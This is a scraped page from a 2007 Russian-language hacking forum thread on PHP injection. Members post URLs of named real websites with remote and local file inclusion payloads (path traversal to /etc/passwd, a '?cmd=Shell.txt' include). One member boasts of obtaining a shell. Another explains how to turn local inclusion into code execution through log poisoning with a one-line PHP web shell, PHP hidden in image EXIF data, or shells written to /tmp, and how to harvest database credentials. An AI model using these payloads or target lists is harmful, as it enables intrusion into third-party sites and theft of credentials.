HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу PHP Иньекции
   
Ответ
Страница 52 из 143 « Первая < 242 48 49 50 51 52 53 54 55 56 62102 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 28.10.2007, 19:20
Fugitif
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
Провел на форуме:
1781065

Репутация: 869
По умолчанию
Powermail

Код:
http://www.powermail.in/?cmd=Shell.txt?
 
Ответить с цитированием

  #2  
Старый 29.10.2007, 02:35
Daned
Новичок
Регистрация: 09.03.2007
Сообщений: 29
Провел на форуме:
328840

Репутация: 31
Отправить сообщение для Daned с помощью ICQ
По умолчанию
Ахтунг
Цитата:
http://www.rocksanne.de/content.php?cont=[INCLUDE]
http://wsuonline.de/php/bereiche/ferienlager/getpage8.php?group=ferienlager&page=[INCLUDE]
http://www.dr-nikolaus.de/index2.php?s=[INCLUDE]
http://www.hertha-aisch.de/main.php?id=administration&handler=[INCLUDE]
http://www.whs-leipzig.de/index.php?menue=Projekte&content=main.html&subcont ent=[INCLUDE]
http://www.suckforsympathy.de/index.php?file=[INCLUDE]
http://www.siroweb.de/index.php?link=4&seite=[INCLUDE]
http://www.faller.de/start.php?lang=dt&naviUp=6&naviDown=5&page=[INCLUDE]
http://www.ihre-service-agentur.de/stadtnews24/hpmaker/index.php?p=[INCLUDE]
http://www.kgvanderlangenbuende.de/index.php?page=[INCLUDE]
 
Ответить с цитированием

  #3  
Старый 29.10.2007, 17:54
[dword]
Участник форума
Регистрация: 11.04.2007
Сообщений: 103
Провел на форуме:
1006699

Репутация: 273
Отправить сообщение для [dword] с помощью ICQ
По умолчанию
romeguide.it
Код:
http://www.romeguide.it/index2.php?pag=[url]
 
Ответить с цитированием

loc_inj
  #4  
Старый 29.10.2007, 22:29
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow loc_inj
наткнулся на сайтец

Цитата:
http://www.spartak-kostroma.org/news.php?news_id=../../../../etc/passwd
 
Ответить с цитированием

  #5  
Старый 30.10.2007, 19:04
t0ox
Новичок
Регистрация: 23.10.2007
Сообщений: 17
Провел на форуме:
105851

Репутация: 46
По умолчанию
Код:
http://www.sodepau.org/cat/index.php?id=../../../../../etc/passwd
http://www.sodepau.org/cat/index.php?id=../../../../../etc/hosts
http://www.sodepau.org/cat/index.php?id=../../../../../etc/services
http://www.sodepau.org/cat/index.php?id=../../../../../etc/group
http://www.sodepau.org/cat/index.php?id=../../../../../etc/profile
 
Ответить с цитированием

  #6  
Старый 02.11.2007, 14:35
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
будьте внимательны, и получите шелл ;-) а там
Free space : 1550.16 GB Total space: 1805.85 GB

Цитата:
http://austin.smallplanetguide.com/rentals/index.php?p=
 
Ответить с цитированием

  #7  
Старый 02.11.2007, 17:10
nikoTM
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723

Репутация: 22
По умолчанию
Локальный инклудинг

Код:
http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/passwd
http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/ftpusers
http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/hosts
http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/group
http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/services
http://www.tablesandchairs.eu/index.php?page=../../../../../../../../etc/profile
я ничего не смог там сделать(
 
Ответить с цитированием

  #8  
Старый 02.11.2007, 17:14
nikoTM
Познающий
Регистрация: 25.09.2007
Сообщений: 42
Провел на форуме:
217723

Репутация: 22
По умолчанию
тож локалка
Код:
http://www.barsandstuds.co.uk/index.php?page=../../../../../../../../etc/passwd
Обьясните мне плз в чем смысл находить etc/passwd?
 
Ответить с цитированием

  #9  
Старый 03.11.2007, 05:15
Scipio
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734

Репутация: 1917


Отправить сообщение для Scipio с помощью ICQ
По умолчанию
Цитата:
Сообщение от nikoTM  
тож локалка
Код:
http://www.barsandstuds.co.uk/index.php?page=../../../../../../../../etc/passwd
Обьясните мне плз в чем смысл находить etc/passwd?
Смысл в том, что /etc/passwd есть на любой nix-ОС и если получилось его заинклюдить (как вариант прочитать), то значит как минимум локальный инклюд есть (я не беру вариант с опенбэйздир) и не надо подбирать путьк нему, т.к. при любом (большом) количестве /../ ты всеравно его прочитаешь (потому что выше рута / не прыгнешь), а дальше все, что подскажет тебе воображение...
например есть локальный инклюд, ты можешь:

1) прочитать и использовать passwd файл для брута по маске login:login (к тому же узнать путь к домашним директориям пользователей, иногда очень нужно)

2) узнав методом перебора стандартных путей путь к логам апача, ты можешь намеренно вызвать ошибку, записать к примеру в error_log php код а потом этот error_log проинклюдить (заметь локально) и соответственно этот код выполнить (например элементарный веб-шелл <?php system($_GET[cmd]); ?>)

3) если на сайте есть возможность заливки картинок, то ты можешь вставить php код в gif или в Exif данные jpeg картинки, а потом с помошью все того же локального инклюда выполнить этот код (проинклюдив картинку)

4) Есть у тебя к примеру SQL инъекция и у пользователя БД есть права filepriv, но ты не можешь записать шелл т.к. незнаешь путей, или нет ни одной паки доступной из веба с правами на запись, в первом случае ты можешь прочитать файл httpd.conf (если найдешь, и если будут права на чтение) и узнать пути, хотя это можно сделать и через sql-inj, при втором варианте ты пишешь свой шелл в /tmp и с помощью локального инклюда подцепляешь свой шелл из /tmp

5) куча вариантов, насколько фантазии хватит


Если есть просто читалка файлов, то ты можешь посмотреть файлы конфигурации на сайте и узнать пароль и пользователя БД (обычно они в незашифрованном виде)

ну надеюсь ты понял...
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 03.11.2007 в 05:19..
 
Ответить с цитированием

  #10  
Старый 03.11.2007, 04:20
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию
WindowS =)

Цитата:
http://israndom.com/default.php?content=
Ru

Цитата:
http://www.gumanitarij.ru/newsite/default.php?content=
ps: обычно смысл в том,что в passwd пути к папкам юзеров. также можн опопробовать связки логин пароль на фтп,БД и т.д. )
Последний раз редактировалось $n@ke; 03.11.2007 в 04:43..
 
Ответить с цитированием
Ответ
Страница 52 из 143 « Первая < 242 48 49 50 51 52 53 54 55 56 62102 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Books PSalm69 Избранное 273 13.02.2016 01:24
Books PHP FRAGNATIC PHP 186 21.02.2010 02:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ